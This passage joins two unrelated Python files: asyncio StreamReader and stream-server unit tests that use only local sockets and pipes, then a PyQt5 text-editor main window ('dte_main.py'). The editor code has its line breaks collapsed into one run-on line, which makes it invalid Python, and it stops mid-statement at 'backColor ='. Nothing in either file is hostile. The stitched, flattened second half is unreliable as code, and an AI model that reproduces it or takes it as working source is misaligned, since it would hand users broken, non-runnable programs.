    def test_open_unix_connection(self):
        with test_utils.run_test_unix_server() as httpd:
            conn_fut = asyncio.open_unix_connection(httpd.address,
                                                    loop=self.loop)
            self._basetest_open_connection(conn_fut)

    def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
        try:
            reader, writer = self.loop.run_until_complete(open_connection_fut)
        finally:
            asyncio.set_event_loop(None)
        writer.write(b'GET / HTTP/1.0\r\n\r\n')
        f = reader.read()
        data = self.loop.run_until_complete(f)
        self.assertTrue(data.endswith(b'\r\n\r\nTest message'))

        writer.close()

    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_open_connection_no_loop_ssl(self):
        with test_utils.run_test_server(use_ssl=True) as httpd:
            conn_fut = asyncio.open_connection(
                *httpd.address,
                ssl=test_utils.dummy_ssl_context(),
                loop=self.loop)

            self._basetest_open_connection_no_loop_ssl(conn_fut)

    @unittest.skipIf(ssl is None, 'No ssl module')
    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
    def test_open_unix_connection_no_loop_ssl(self):
        with test_utils.run_test_unix_server(use_ssl=True) as httpd:
            conn_fut = asyncio.open_unix_connection(
                httpd.address,
                ssl=test_utils.dummy_ssl_context(),
                server_hostname='',
                loop=self.loop)

            self._basetest_open_connection_no_loop_ssl(conn_fut)

    def _basetest_open_connection_error(self, open_connection_fut):
        reader, writer = self.loop.run_until_complete(open_connection_fut)
        writer._protocol.connection_lost(ZeroDivisionError())
        f = reader.read()
        with self.assertRaises(ZeroDivisionError):
            self.loop.run_until_complete(f)
        writer.close()
        test_utils.run_briefly(self.loop)

    def test_open_connection_error(self):
        with test_utils.run_test_server() as httpd:
            conn_fut = asyncio.open_connection(*httpd.address,
                                               loop=self.loop)
            self._basetest_open_connection_error(conn_fut)

    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
    def test_open_unix_connection_error(self):
        with test_utils.run_test_unix_server() as httpd:
            conn_fut = asyncio.open_unix_connection(httpd.address,
                                                    loop=self.loop)
            self._basetest_open_connection_error(conn_fut)

    def test_feed_empty_data(self):
        stream = asyncio.StreamReader(loop=self.loop)

        stream.feed_data(b'')
        self.assertEqual(b'', stream._buffer)

    def test_feed_nonempty_data(self):
        stream = asyncio.StreamReader(loop=self.loop)

        stream.feed_data(self.DATA)
        self.assertEqual(self.DATA, stream._buffer)

    def test_read_zero(self):
        # Read zero bytes.
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(self.DATA)

        data = self.loop.run_until_complete(stream.read(0))
        self.assertEqual(b'', data)
        self.assertEqual(self.DATA, stream._buffer)

    def test_read(self):
        # Read bytes.
        stream = asyncio.StreamReader(loop=self.loop)
        read_task = asyncio.Task(stream.read(30), loop=self.loop)

        def cb():
            stream.feed_data(self.DATA)
        self.loop.call_soon(cb)

        data = self.loop.run_until_complete(read_task)
        self.assertEqual(self.DATA, data)
        self.assertEqual(b'', stream._buffer)

    def test_read_line_breaks(self):
        # Read bytes without line breaks.
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'line1')
        stream.feed_data(b'line2')

        data = self.loop.run_until_complete(stream.read(5))

        self.assertEqual(b'line1', data)
        self.assertEqual(b'line2', stream._buffer)

    def test_read_eof(self):
        # Read bytes, stop at eof.
        stream = asyncio.StreamReader(loop=self.loop)
        read_task = asyncio.Task(stream.read(1024), loop=self.loop)

        def cb():
            stream.feed_eof()
        self.loop.call_soon(cb)

        data = self.loop.run_until_complete(read_task)
        self.assertEqual(b'', data)
        self.assertEqual(b'', stream._buffer)

    def test_read_until_eof(self):
        # Read all bytes until eof.
        stream = asyncio.StreamReader(loop=self.loop)
        read_task = asyncio.Task(stream.read(-1), loop=self.loop)

        def cb():
            stream.feed_data(b'chunk1\n')
            stream.feed_data(b'chunk2')
            stream.feed_eof()
        self.loop.call_soon(cb)

        data = self.loop.run_until_complete(read_task)

        self.assertEqual(b'chunk1\nchunk2', data)
        self.assertEqual(b'', stream._buffer)

    def test_read_exception(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'line\n')

        data = self.loop.run_until_complete(stream.read(2))
        self.assertEqual(b'li', data)

        stream.set_exception(ValueError())
        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.read(2))

    def test_invalid_limit(self):
        with self.assertRaisesRegex(ValueError, 'imit'):
            asyncio.StreamReader(limit=0, loop=self.loop)

        with self.assertRaisesRegex(ValueError, 'imit'):
            asyncio.StreamReader(limit=-1, loop=self.loop)

    def test_read_limit(self):
        stream = asyncio.StreamReader(limit=3, loop=self.loop)
        stream.feed_data(b'chunk')
        data = self.loop.run_until_complete(stream.read(5))
        self.assertEqual(b'chunk', data)
        self.assertEqual(b'', stream._buffer)

    def test_readline(self):
        # Read one line. 'readline' will need to wait for the data
        # to come from 'cb'
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'chunk1 ')
        read_task = asyncio.Task(stream.readline(), loop=self.loop)

        def cb():
            stream.feed_data(b'chunk2 ')
            stream.feed_data(b'chunk3 ')
            stream.feed_data(b'\n chunk4')
        self.loop.call_soon(cb)

        line = self.loop.run_until_complete(read_task)
        self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
        self.assertEqual(b' chunk4', stream._buffer)

    def test_readline_limit_with_existing_data(self):
        # Read one line. The data is in StreamReader's buffer
        # before the event loop is run.
        stream = asyncio.StreamReader(limit=3, loop=self.loop)
        stream.feed_data(b'li')
        stream.feed_data(b'ne1\nline2\n')

        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readline())
        # The buffer should contain the remaining data after exception
        self.assertEqual(b'line2\n', stream._buffer)

        stream = asyncio.StreamReader(limit=3, loop=self.loop)
        stream.feed_data(b'li')
        stream.feed_data(b'ne1')
        stream.feed_data(b'li')

        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readline())
        # No b'\n' at the end. The 'limit' is set to 3. So before
        # waiting for the new data in buffer, 'readline' will consume
        # the entire buffer, and since the length of the consumed data
        # is more than 3, it will raise a ValueError. The buffer is
        # expected to be empty now.
        self.assertEqual(b'', stream._buffer)

    def test_at_eof(self):
        stream = asyncio.StreamReader(loop=self.loop)
        self.assertFalse(stream.at_eof())

        stream.feed_data(b'some data\n')
        self.assertFalse(stream.at_eof())

        self.loop.run_until_complete(stream.readline())
        self.assertFalse(stream.at_eof())

        stream.feed_data(b'some data\n')
        stream.feed_eof()
        self.loop.run_until_complete(stream.readline())
        self.assertTrue(stream.at_eof())

    def test_readline_limit(self):
        # Read one line. StreamReaders are fed with data after
        # their 'readline' methods are called.
        stream = asyncio.StreamReader(limit=7, loop=self.loop)

        def cb():
            stream.feed_data(b'chunk1')
            stream.feed_data(b'chunk2')
            stream.feed_data(b'chunk3\n')
            stream.feed_eof()
        self.loop.call_soon(cb)

        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readline())
        # The buffer had just one line of data, and after raising
        # a ValueError it should be empty.
        self.assertEqual(b'', stream._buffer)

        stream = asyncio.StreamReader(limit=7, loop=self.loop)

        def cb():
            stream.feed_data(b'chunk1')
            stream.feed_data(b'chunk2\n')
            stream.feed_data(b'chunk3\n')
            stream.feed_eof()
        self.loop.call_soon(cb)

        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readline())
        self.assertEqual(b'chunk3\n', stream._buffer)

        # check strictness of the limit
        stream = asyncio.StreamReader(limit=7, loop=self.loop)
        stream.feed_data(b'1234567\n')
        line = self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'1234567\n', line)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'12345678\n')
        with self.assertRaises(ValueError) as cm:
            self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'12345678')
        with self.assertRaises(ValueError) as cm:
            self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'', stream._buffer)

    def test_readline_nolimit_nowait(self):
        # All needed data for the first 'readline' call will be
        # in the buffer.
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(self.DATA[:6])
        stream.feed_data(self.DATA[6:])

        line = self.loop.run_until_complete(stream.readline())

        self.assertEqual(b'line1\n', line)
        self.assertEqual(b'line2\nline3\n', stream._buffer)

    def test_readline_eof(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'some data')
        stream.feed_eof()

        line = self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'some data', line)

    def test_readline_empty_eof(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_eof()

        line = self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'', line)

    def test_readline_read_byte_count(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(self.DATA)

        self.loop.run_until_complete(stream.readline())

        data = self.loop.run_until_complete(stream.read(7))

        self.assertEqual(b'line2\nl', data)
        self.assertEqual(b'ine3\n', stream._buffer)

    def test_readline_exception(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'line\n')

        data = self.loop.run_until_complete(stream.readline())
        self.assertEqual(b'line\n', data)

        stream.set_exception(ValueError())
        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readline())
        self.assertEqual(b'', stream._buffer)

    def test_readuntil_separator(self):
        stream = asyncio.StreamReader(loop=self.loop)
        with self.assertRaisesRegex(ValueError, 'Separator should be'):
            self.loop.run_until_complete(stream.readuntil(separator=b''))

    def test_readuntil_multi_chunks(self):
        stream = asyncio.StreamReader(loop=self.loop)

        stream.feed_data(b'lineAAA')
        data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
        self.assertEqual(b'lineAAA', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'lineAAA')
        data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
        self.assertEqual(b'lineAAA', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'lineAAAxxx')
        data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
        self.assertEqual(b'lineAAA', data)
        self.assertEqual(b'xxx', stream._buffer)

    def test_readuntil_multi_chunks_1(self):
        stream = asyncio.StreamReader(loop=self.loop)

        stream.feed_data(b'QWEaa')
        stream.feed_data(b'XYaa')
        stream.feed_data(b'a')
        data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
        self.assertEqual(b'QWEaaXYaaa', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'QWEaa')
        stream.feed_data(b'XYa')
        stream.feed_data(b'aa')
        data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
        self.assertEqual(b'QWEaaXYaaa', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'aaa')
        data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
        self.assertEqual(b'aaa', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'Xaaa')
        data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
        self.assertEqual(b'Xaaa', data)
        self.assertEqual(b'', stream._buffer)

        stream.feed_data(b'XXX')
        stream.feed_data(b'a')
        stream.feed_data(b'a')
        stream.feed_data(b'a')
        data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
        self.assertEqual(b'XXXaaa', data)
        self.assertEqual(b'', stream._buffer)

    def test_readuntil_eof(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'some dataAA')
        stream.feed_eof()

        with self.assertRaises(asyncio.IncompleteReadError) as cm:
            self.loop.run_until_complete(stream.readuntil(b'AAA'))
        self.assertEqual(cm.exception.partial, b'some dataAA')
        self.assertIsNone(cm.exception.expected)
        self.assertEqual(b'', stream._buffer)

    def test_readuntil_limit_found_sep(self):
        stream = asyncio.StreamReader(loop=self.loop, limit=3)
        stream.feed_data(b'some dataAA')

        with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                    'not found') as cm:
            self.loop.run_until_complete(stream.readuntil(b'AAA'))

        self.assertEqual(b'some dataAA', stream._buffer)

        stream.feed_data(b'A')
        with self.assertRaisesRegex(asyncio.LimitOverrunError,
                                    'is found') as cm:
            self.loop.run_until_complete(stream.readuntil(b'AAA'))

        self.assertEqual(b'some dataAAA', stream._buffer)

    def test_readexactly_zero_or_less(self):
        # Read exact number of bytes (zero or less).
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(self.DATA)

        data = self.loop.run_until_complete(stream.readexactly(0))
        self.assertEqual(b'', data)
        self.assertEqual(self.DATA, stream._buffer)

        with self.assertRaisesRegex(ValueError, 'less than zero'):
            self.loop.run_until_complete(stream.readexactly(-1))
        self.assertEqual(self.DATA, stream._buffer)

    def test_readexactly(self):
        # Read exact number of bytes.
        stream = asyncio.StreamReader(loop=self.loop)
        n = 2 * len(self.DATA)
        read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)

        def cb():
            stream.feed_data(self.DATA)
            stream.feed_data(self.DATA)
            stream.feed_data(self.DATA)
        self.loop.call_soon(cb)

        data = self.loop.run_until_complete(read_task)
        self.assertEqual(self.DATA + self.DATA, data)
        self.assertEqual(self.DATA, stream._buffer)

    def test_readexactly_limit(self):
        stream = asyncio.StreamReader(limit=3, loop=self.loop)
        stream.feed_data(b'chunk')
        data = self.loop.run_until_complete(stream.readexactly(5))
        self.assertEqual(b'chunk', data)
        self.assertEqual(b'', stream._buffer)

    def test_readexactly_eof(self):
        # Read exact number of bytes (eof).
        stream = asyncio.StreamReader(loop=self.loop)
        n = 2 * len(self.DATA)
        read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)

        def cb():
            stream.feed_data(self.DATA)
            stream.feed_eof()
        self.loop.call_soon(cb)

        with self.assertRaises(asyncio.IncompleteReadError) as cm:
            self.loop.run_until_complete(read_task)
        self.assertEqual(cm.exception.partial, self.DATA)
        self.assertEqual(cm.exception.expected, n)
        self.assertEqual(str(cm.exception),
                         '18 bytes read on a total of 36 expected bytes')
        self.assertEqual(b'', stream._buffer)

    def test_readexactly_exception(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'line\n')

        data = self.loop.run_until_complete(stream.readexactly(2))
        self.assertEqual(b'li', data)

        stream.set_exception(ValueError())
        self.assertRaises(
            ValueError, self.loop.run_until_complete, stream.readexactly(2))

    def test_exception(self):
        stream = asyncio.StreamReader(loop=self.loop)
        self.assertIsNone(stream.exception())

        exc = ValueError()
        stream.set_exception(exc)
        self.assertIs(stream.exception(), exc)

    def test_exception_waiter(self):
        stream = asyncio.StreamReader(loop=self.loop)

        @asyncio.coroutine
        def set_err():
            stream.set_exception(ValueError())

        t1 = asyncio.Task(stream.readline(), loop=self.loop)
        t2 = asyncio.Task(set_err(), loop=self.loop)

        self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop))

        self.assertRaises(ValueError, t1.result)

    def test_exception_cancel(self):
        stream = asyncio.StreamReader(loop=self.loop)

        t = asyncio.Task(stream.readline(), loop=self.loop)
        test_utils.run_briefly(self.loop)
        t.cancel()
        test_utils.run_briefly(self.loop)
        # The following line fails if set_exception() isn't careful.
        stream.set_exception(RuntimeError('message'))
        test_utils.run_briefly(self.loop)
        self.assertIs(stream._waiter, None)

    def test_start_server(self):

        class MyServer:

            def __init__(self, loop):
                self.server = None
                self.loop = loop

            @asyncio.coroutine
            def handle_client(self, client_reader, client_writer):
                data = yield from client_reader.readline()
                client_writer.write(data)
                yield from client_writer.drain()
                client_writer.close()

            def start(self):
                sock = socket.socket()
                sock.bind(('127.0.0.1', 0))
                self.server = self.loop.run_until_complete(
                    asyncio.start_server(self.handle_client,
                                         sock=sock,
                                         loop=self.loop))
                return sock.getsockname()

            def handle_client_callback(self, client_reader, client_writer):
                self.loop.create_task(self.handle_client(client_reader,
                                                         client_writer))

            def start_callback(self):
                sock = socket.socket()
                sock.bind(('127.0.0.1', 0))
                addr = sock.getsockname()
                sock.close()
                self.server = self.loop.run_until_complete(
                    asyncio.start_server(self.handle_client_callback,
                                         host=addr[0], port=addr[1],
                                         loop=self.loop))
                return addr

            def stop(self):
                if self.server is not None:
                    self.server.close()
                    self.loop.run_until_complete(self.server.wait_closed())
                    self.server = None

        @asyncio.coroutine
        def client(addr):
            reader, writer = yield from asyncio.open_connection(
                *addr, loop=self.loop)
            # send a line
            writer.write(b"hello world!\n")
            # read it back
            msgback = yield from reader.readline()
            writer.close()
            return msgback

        # test the server variant with a coroutine as client handler
        server = MyServer(self.loop)
        addr = server.start()
        msg = self.loop.run_until_complete(asyncio.Task(client(addr),
                                                        loop=self.loop))
        server.stop()
        self.assertEqual(msg, b"hello world!\n")

        # test the server variant with a callback as client handler
        server = MyServer(self.loop)
        addr = server.start_callback()
        msg = self.loop.run_until_complete(asyncio.Task(client(addr),
                                                        loop=self.loop))
        server.stop()
        self.assertEqual(msg, b"hello world!\n")

    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
    def test_start_unix_server(self):

        class MyServer:

            def __init__(self, loop, path):
                self.server = None
                self.loop = loop
                self.path = path

            @asyncio.coroutine
            def handle_client(self, client_reader, client_writer):
                data = yield from client_reader.readline()
                client_writer.write(data)
                yield from client_writer.drain()
                client_writer.close()

            def start(self):
                self.server = self.loop.run_until_complete(
                    asyncio.start_unix_server(self.handle_client,
                                              path=self.path,
                                              loop=self.loop))

            def handle_client_callback(self, client_reader, client_writer):
                self.loop.create_task(self.handle_client(client_reader,
                                                         client_writer))

            def start_callback(self):
                start = asyncio.start_unix_server(self.handle_client_callback,
                                                  path=self.path,
                                                  loop=self.loop)
                self.server = self.loop.run_until_complete(start)

            def stop(self):
                if self.server is not None:
                    self.server.close()
                    self.loop.run_until_complete(self.server.wait_closed())
                    self.server = None

        @asyncio.coroutine
        def client(path):
            reader, writer = yield from asyncio.open_unix_connection(
                path, loop=self.loop)
            # send a line
            writer.write(b"hello world!\n")
            # read it back
            msgback = yield from reader.readline()
            writer.close()
            return msgback

        # test the server variant with a coroutine as client handler
        with test_utils.unix_socket_path() as path:
            server = MyServer(self.loop, path)
            server.start()
            msg = self.loop.run_until_complete(asyncio.Task(client(path),
                                                            loop=self.loop))
            server.stop()
            self.assertEqual(msg, b"hello world!\n")

        # test the server variant with a callback as client handler
        with test_utils.unix_socket_path() as path:
            server = MyServer(self.loop, path)
            server.start_callback()
            msg = self.loop.run_until_complete(asyncio.Task(client(path),
                                                            loop=self.loop))
            server.stop()
            self.assertEqual(msg, b"hello world!\n")

    @unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
    def test_read_all_from_pipe_reader(self):
        # See asyncio issue 168.  This test is derived from the example
        # subprocess_attach_read_pipe.py, but we configure the
        # StreamReader's limit so that twice it is less than the size
        # of the data writter.  Also we must explicitly attach a child
        # watcher to the event loop.

        code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
        rfd, wfd = os.pipe()
        args = [sys.executable, '-c', code, str(wfd)]

        pipe = open(rfd, 'rb', 0)
        reader = asyncio.StreamReader(loop=self.loop, limit=1)
        protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
        transport, _ = self.loop.run_until_complete(
            self.loop.connect_read_pipe(lambda: protocol, pipe))

        watcher = asyncio.SafeChildWatcher()
        watcher.attach_loop(self.loop)
        try:
            asyncio.set_child_watcher(watcher)
            create = asyncio.create_subprocess_exec(*args,
                                                    pass_fds={wfd},
                                                    loop=self.loop)
            proc = self.loop.run_until_complete(create)
            self.loop.run_until_complete(proc.wait())
        finally:
            asyncio.set_child_watcher(None)

        os.close(wfd)
        data = self.loop.run_until_complete(reader.read(-1))
        self.assertEqual(data, b'data')

    def test_streamreader_constructor(self):
        self.addCleanup(asyncio.set_event_loop, None)
        asyncio.set_event_loop(self.loop)

        # asyncio issue #184: Ensure that StreamReaderProtocol constructor
        # retrieves the current loop if the loop parameter is not set
        reader = asyncio.StreamReader()
        self.assertIs(reader._loop, self.loop)

    def test_streamreaderprotocol_constructor(self):
        self.addCleanup(asyncio.set_event_loop, None)
        asyncio.set_event_loop(self.loop)

        # asyncio issue #184: Ensure that StreamReaderProtocol constructor
        # retrieves the current loop if the loop parameter is not set
        reader = mock.Mock()
        protocol = asyncio.StreamReaderProtocol(reader)
        self.assertIs(protocol._loop, self.loop)

    def test_drain_raises(self):
        # See http://bugs.python.org/issue25441

        # This test should not use asyncio for the mock server; the
        # whole point of the test is to test for a bug in drain()
        # where it never gives up the event loop but the socket is
        # closed on the server side.

        q = queue.Queue()

        def server():
            # Runs in a separate thread.
            sock = socket.socket()
            with sock:
                sock.bind(('localhost', 0))
                sock.listen(1)
                addr = sock.getsockname()
                q.put(addr)
                clt, _ = sock.accept()
                clt.close()

        @asyncio.coroutine
        def client(host, port):
            reader, writer = yield from asyncio.open_connection(
                host, port, loop=self.loop)

            while True:
                writer.write(b"foo\n")
                yield from writer.drain()

        # Start the server thread and wait for it to be listening.
        thread = threading.Thread(target=server)
        thread.setDaemon(True)
        thread.start()
        addr = q.get()

        # Should not be stuck in an infinite loop.
        with self.assertRaises((ConnectionResetError, BrokenPipeError)):
            self.loop.run_until_complete(client(*addr))

        # Clean up the thread.  (Only on success; on failure, it may
        # be stuck in accept().)
        thread.join()

    def test___repr__(self):
        stream = asyncio.StreamReader(loop=self.loop)
        self.assertEqual("<StreamReader>", repr(stream))

    def test___repr__nondefault_limit(self):
        stream = asyncio.StreamReader(loop=self.loop, limit=123)
        self.assertEqual("<StreamReader l=123>", repr(stream))

    def test___repr__eof(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_eof()
        self.assertEqual("<StreamReader eof>", repr(stream))

    def test___repr__data(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream.feed_data(b'data')
        self.assertEqual("<StreamReader 4 bytes>", repr(stream))

    def test___repr__exception(self):
        stream = asyncio.StreamReader(loop=self.loop)
        exc = RuntimeError()
        stream.set_exception(exc)
        self.assertEqual("<StreamReader e=RuntimeError()>", repr(stream))

    def test___repr__waiter(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream._waiter = asyncio.Future(loop=self.loop)
        self.assertRegex(
            repr(stream),
            "<StreamReader w=<Future pending[\S ]*>>")
        stream._waiter.set_result(None)
        self.loop.run_until_complete(stream._waiter)
        stream._waiter = None
        self.assertEqual("<StreamReader>", repr(stream))

    def test___repr__transport(self):
        stream = asyncio.StreamReader(loop=self.loop)
        stream._transport = mock.Mock()
        stream._transport.__repr__ = mock.Mock()
        stream._transport.__repr__.return_value = "<Transport>"
        self.assertEqual("<StreamReader t=<Transport>>", repr(stream))


if __name__ == '__main__':
    unittest.main()
dte_main.py
# -*- coding: utf-8 -*- import sys import threading #PYQT5 PyQt4’s QtGui module has been split into PyQt5’s QtGui, QtPrintSupport and QtWidgets modules from check_connectivity import is_connected from event_updater import * from dte_encryption import * from bs4 import BeautifulSoup from PyQt5 import QtWidgets #PYQT5 QMainWindow, QApplication, QAction, QFontComboBox, QSpinBox, QTextEdit, QMessageBox #PYQT5 QFileDialog, QColorDialog, QDialog from PyQt5 import QtPrintSupport #PYQT5 QPrintPreviewDialog, QPrintDialog from PyQt5 import QtGui, QtCore from PyQt5.QtCore import Qt from ext import * class Main(QtWidgets.QMainWindow): def __init__(self,parent=None): QtWidgets.QMainWindow.__init__(self,parent) self.filename = "" self.fileid = "" self.changesSaved = True self.initUI() def initToolbar(self): self.newAction = QtWidgets.QAction(QtGui.QIcon("icons/new.png"),"New",self) self.newAction.setShortcut("Ctrl+N") self.newAction.setStatusTip("Create a new document from scratch.") self.newAction.triggered.connect(self.new) self.openAction = QtWidgets.QAction(QtGui.QIcon("icons/open.png"),"Open file",self) self.openAction.setStatusTip("Open existing document") self.openAction.setShortcut("Ctrl+O") self.openAction.triggered.connect(self.open) self.saveAction = QtWidgets.QAction(QtGui.QIcon("icons/save.png"),"Save",self) self.saveAction.setStatusTip("Save document") self.saveAction.setShortcut("Ctrl+S") self.saveAction.triggered.connect(self.save) self.printAction = QtWidgets.QAction(QtGui.QIcon("icons/print.png"),"Print document",self) self.printAction.setStatusTip("Print document") self.printAction.setShortcut("Ctrl+P") self.printAction.triggered.connect(self.printHandler) self.previewAction = QtWidgets.QAction(QtGui.QIcon("icons/preview.png"),"Page view",self) self.previewAction.setStatusTip("Preview page before printing") self.previewAction.setShortcut("Ctrl+Shift+P") self.previewAction.triggered.connect(self.preview) self.findAction = 
QtWidgets.QAction(QtGui.QIcon("icons/find.png"),"Find and replace",self) self.findAction.setStatusTip("Find and replace words in your document") self.findAction.setShortcut("Ctrl+F") self.findAction.triggered.connect(find.Find(self).show) self.cutAction = QtWidgets.QAction(QtGui.QIcon("icons/cut.png"),"Cut to clipboard",self) self.cutAction.setStatusTip("Delete and copy text to clipboard") self.cutAction.setShortcut("Ctrl+X") self.cutAction.triggered.connect(self.text.cut) self.copyAction = QtWidgets.QAction(QtGui.QIcon("icons/copy.png"),"Copy to clipboard",self) self.copyAction.setStatusTip("Copy text to clipboard") self.copyAction.setShortcut("Ctrl+C") self.copyAction.triggered.connect(self.text.copy) self.pasteAction = QtWidgets.QAction(QtGui.QIcon("icons/paste.png"),"Paste from clipboard",self) self.pasteAction.setStatusTip("Paste text from clipboard") self.pasteAction.setShortcut("Ctrl+V") self.pasteAction.triggered.connect(self.text.paste) self.undoAction = QtWidgets.QAction(QtGui.QIcon("icons/undo.png"),"Undo last action",self) self.undoAction.setStatusTip("Undo last action") self.undoAction.setShortcut("Ctrl+Z") self.undoAction.triggered.connect(self.text.undo) self.redoAction = QtWidgets.QAction(QtGui.QIcon("icons/redo.png"),"Redo last undone thing",self) self.redoAction.setStatusTip("Redo last undone thing") self.redoAction.setShortcut("Ctrl+Y") self.redoAction.triggered.connect(self.text.redo) dateTimeAction = QtWidgets.QAction(QtGui.QIcon("icons/calender.png"),"Insert current date/time",self) dateTimeAction.setStatusTip("Insert current date/time") dateTimeAction.setShortcut("Ctrl+D") dateTimeAction.triggered.connect(datetime.DateTime(self).show) wordCountAction = QtWidgets.QAction(QtGui.QIcon("icons/count.png"),"See word/symbol count",self) wordCountAction.setStatusTip("See word/symbol count") wordCountAction.setShortcut("Ctrl+W") wordCountAction.triggered.connect(self.wordCount) tableAction = QtWidgets.QAction(QtGui.QIcon("icons/table.png"),"Insert 
table",self) tableAction.setStatusTip("Insert table") tableAction.setShortcut("Ctrl+T") tableAction.triggered.connect(table.Table(self).show) imageAction = QtWidgets.QAction(QtGui.QIcon("icons/image.png"),"Insert image",self) imageAction.setStatusTip("Insert image") imageAction.setShortcut("Ctrl+Shift+I") imageAction.triggered.connect(self.insertImage) bulletAction = QtWidgets.QAction(QtGui.QIcon("icons/bullet.png"),"Insert bullet List",self) bulletAction.setStatusTip("Insert bullet list") bulletAction.setShortcut("Ctrl+Shift+B") bulletAction.triggered.connect(self.bulletList) numberedAction = QtWidgets.QAction(QtGui.QIcon("icons/number.png"),"Insert numbered List",self) numberedAction.setStatusTip("Insert numbered list") numberedAction.setShortcut("Ctrl+Shift+L") numberedAction.triggered.connect(self.numberList) self.toolbar = self.addToolBar("Options") self.toolbar.addAction(self.newAction) self.toolbar.addAction(self.openAction) self.toolbar.addAction(self.saveAction) self.toolbar.addSeparator() self.toolbar.addAction(self.printAction) self.toolbar.addAction(self.previewAction) self.toolbar.addSeparator() self.toolbar.addAction(self.cutAction) self.toolbar.addAction(self.copyAction) self.toolbar.addAction(self.pasteAction) self.toolbar.addAction(self.undoAction) self.toolbar.addAction(self.redoAction) self.toolbar.addSeparator() self.toolbar.addAction(self.findAction) self.toolbar.addAction(dateTimeAction) self.toolbar.addAction(wordCountAction) self.toolbar.addAction(tableAction) self.toolbar.addAction(imageAction) self.toolbar.addSeparator() self.toolbar.addAction(bulletAction) self.toolbar.addAction(numberedAction) self.addToolBarBreak() def initFormatbar(self): fontBox = QtWidgets.QFontComboBox(self) fontBox.currentFontChanged.connect(lambda font: self.text.setCurrentFont(font)) fontSize = QtWidgets.QSpinBox(self) # Will display " pt" after each value fontSize.setSuffix(" pt") fontSize.valueChanged.connect(lambda size: self.text.setFontPointSize(size)) 
fontSize.setValue(14) fontColor = QtWidgets.QAction(QtGui.QIcon("icons/font-color.png"),"Change font color",self) fontColor.triggered.connect(self.fontColorChanged) boldAction = QtWidgets.QAction(QtGui.QIcon("icons/bold.png"),"Bold",self) boldAction.triggered.connect(self.bold) italicAction = QtWidgets.QAction(QtGui.QIcon("icons/italic.png"),"Italic",self) italicAction.triggered.connect(self.italic) underlAction = QtWidgets.QAction(QtGui.QIcon("icons/underline.png"),"Underline",self) underlAction.triggered.connect(self.underline) strikeAction = QtWidgets.QAction(QtGui.QIcon("icons/strike.png"),"Strike-out",self) strikeAction.triggered.connect(self.strike) superAction = QtWidgets.QAction(QtGui.QIcon("icons/superscript.png"),"Superscript",self) superAction.triggered.connect(self.superScript) subAction = QtWidgets.QAction(QtGui.QIcon("icons/subscript.png"),"Subscript",self) subAction.triggered.connect(self.subScript) alignLeft = QtWidgets.QAction(QtGui.QIcon("icons/align-left.png"),"Align left",self) alignLeft.triggered.connect(self.alignLeft) alignCenter = QtWidgets.QAction(QtGui.QIcon("icons/align-center.png"),"Align center",self) alignCenter.triggered.connect(self.alignCenter) alignRight = QtWidgets.QAction(QtGui.QIcon("icons/align-right.png"),"Align right",self) alignRight.triggered.connect(self.alignRight) alignJustify = QtWidgets.QAction(QtGui.QIcon("icons/align-justify.png"),"Align justify",self) alignJustify.triggered.connect(self.alignJustify) indentAction = QtWidgets.QAction(QtGui.QIcon("icons/indent.png"),"Indent Area",self) indentAction.setShortcut("Ctrl+Tab") indentAction.triggered.connect(self.indent) dedentAction = QtWidgets.QAction(QtGui.QIcon("icons/dedent.png"),"Dedent Area",self) dedentAction.setShortcut("Shift+Tab") dedentAction.triggered.connect(self.dedent) backColor = 